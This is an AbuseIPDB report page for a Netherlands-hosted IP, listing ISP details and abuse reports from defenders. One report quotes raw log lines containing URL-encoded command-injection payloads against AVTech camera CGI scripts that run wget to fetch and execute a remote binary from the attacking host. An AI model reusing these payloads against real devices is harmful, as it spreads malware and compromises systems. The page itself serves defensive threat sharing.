JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 176.65.148.120

176.65.148.120 was found in our database!

This IP was reported 8,956 times. Confidence of Abuse is 100%: ?

100%

ISP	Pfcloud UG
Usage Type	Data Center/Web Hosting/Transit
ASN	AS51396
Hostname(s)	176.65.148.120.ptr.pfcloud.network
Domain Name	pfcloud.io
Country	🇳🇱 Netherlands
City	Hopel, Limburg

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 176.65.148.120

Whois 176.65.148.120

IP Abuse Reports for 176.65.148.120:

This IP address has been reported a total of 8,956 times from 205 distinct sources. 176.65.148.120 was first reported on July 1st 2025, and the most recent report was 1 hour ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 WhiteFireOCN1	2025-08-06 02:05:53 (9 months ago)	1 unauthorized connection attempt to port 80 HTTP GET to / from 176[.]65[.]148[.]120:45210 - 2025-08 ... show more 1 unauthorized connection attempt to port 80 HTTP GET to / from 176[.]65[.]148[.]120:45210 - 2025-08-06T02:02:48 show less	Port Scan
🇩🇪 centurion	2025-08-06 02:03:56 (9 months ago)	Blocked by UFW on dc00 [80/tcp] Source port: 59129 TTL: 244 Packet length: 40 TOS: 0x00 This report ... show more Blocked by UFW on dc00 [80/tcp] Source port: 59129 TTL: 244 Packet length: 40 TOS: 0x00 This report was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Web App Attack
🇺🇸 MPL	2025-08-06 02:00:15 (9 months ago)	tcp/80 (11 or more attempts)	Port Scan
🇺🇸 mubusys.com	2025-08-06 01:46:33 (9 months ago)	176.65.148.120 - - [05/Aug/2025:22:46:31 -0300] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip= ... show more 176.65.148.120 - - [05/Aug/2025:22:46:31 -0300] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://176.65.148.120/av;%20chmod%20777%20av;%20./av)&password=admin HTTP/1.1" 404 153 "-" "Snickers-Avtech" "-" 176.65.148.120 - - [05/Aug/2025:22:46:33 -0300] "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd%20/tmp;%20wget%20http://176.65.148.120/av;%20chmod%20777%20av;%20./av;%20echo%20snickers_was_here HTTP/1.1" 404 153 "-" "Snickers-Avtech" "-" show less	Hacking
🇩🇪 centurion	2025-08-06 01:30:17 (9 months ago)	Unauthorized attempt on uptime [32451/tcp] Source port: 34531 TTL: 243 Packet length: 40 TOS: 0x00 h ... show more Unauthorized attempt on uptime [32451/tcp] Source port: 34531 TTL: 243 Packet length: 40 TOS: 0x00 https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇳🇱 Study Bitcoin 🤗	2025-08-06 00:48:21 (9 months ago)	Port probe to tcp/80 (http) [srv124]	Port Scan Bad Web Bot Web App Attack
🇺🇸 MPL	2025-08-06 00:46:52 (9 months ago)	tcp/80	Port Scan
🇺🇸 MPL	2025-08-06 00:46:52 (9 months ago)	tcp/80	Port Scan
🇨🇿 Countryman	2025-08-06 00:41:35 (9 months ago)	IPS detection: Multiple.Routers.GPON.formLogin.Remote.Command.Injection	Hacking
🇨🇿 Countryman	2025-08-06 00:41:35 (9 months ago)	IPS detection: Multiple.Routers.GPON.formLogin.Remote.Command.Injection	Hacking
🇨🇿 Countryman	2025-08-06 00:41:35 (9 months ago)	IPS detection: Multiple.Routers.GPON.formLogin.Remote.Command.Injection	Hacking
🇩🇪 QUADEMU Abuse Dpt	2025-08-06 00:26:49 (9 months ago)	Noxious/Nuisible/вредоносный Host.	Port Scan Exploited Host
🇨🇴 j458rjqwi348fhjq46	2025-08-06 00:26:36 (9 months ago)	Malicious IP detected by WAF with anomaly score 10.0. Attack types: Timestamp deviates by 1.8 hours, ... show more Malicious IP detected by WAF with anomaly score 10.0. Attack types: Timestamp deviates by 1.8 hours, Suspicious URL detected (extended rules), Timestamp deviates by 1.3 hours (+3 more). Activity: 225 requests to 5 URLs. Period: 2025-08-05 18:51:10 - 2025-08-05 18:51:10 (America/Bogota). Origin: NL. Source: Automated WAF log analysis. show less	Hacking Web App Attack
🇮🇩 securejdprop	2025-08-05 23:51:29 (9 months ago)	This IP was detected by CrowdSec triggering crowdsecurity/suricata-major-severity. Ip 176.65.148.120 ... show more This IP was detected by CrowdSec triggering crowdsecurity/suricata-major-severity. Ip 176.65.148.120 performed 'crowdsecurity/suricata-major-severity' (1 events over 0s) at 2025-08-05 23:51:27.522133537 +0000 UTC show less	Web App Attack
🇩🇪 Mykola Spesivtsev	2025-08-05 23:51:14 (9 months ago)	HTTP Tarpit detected bot activity:TargetPort:80, Path:/, Method:GET, UA:N/A	Port Scan Bad Web Bot Web App Attack

Showing 8926 to 8940 of 8956 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇻🇳 171.225.198.72

🇨🇳 116.178.128.99

🇷🇺 109.63.130.95

🇺🇸 104.154.147.248

🇹🇬 102.64.170.145

🇺🇸 100.28.153.226

🇱🇹 81.30.98.158

🇩🇪 64.225.105.221

🇻🇳 58.187.66.74

🇳🇱 45.148.10.183

🇨🇳 219.134.115.38

🇺🇸 167.99.225.143

🇫🇷 161.97.84.188

🇨🇳 118.196.116.42

🇨🇳 117.50.70.125

🇫🇷 91.196.152.113

🇵🇱 87.251.64.155

🇱🇺 64.89.160.167

🇩🇪 62.60.245.173

🇳🇱 45.148.10.157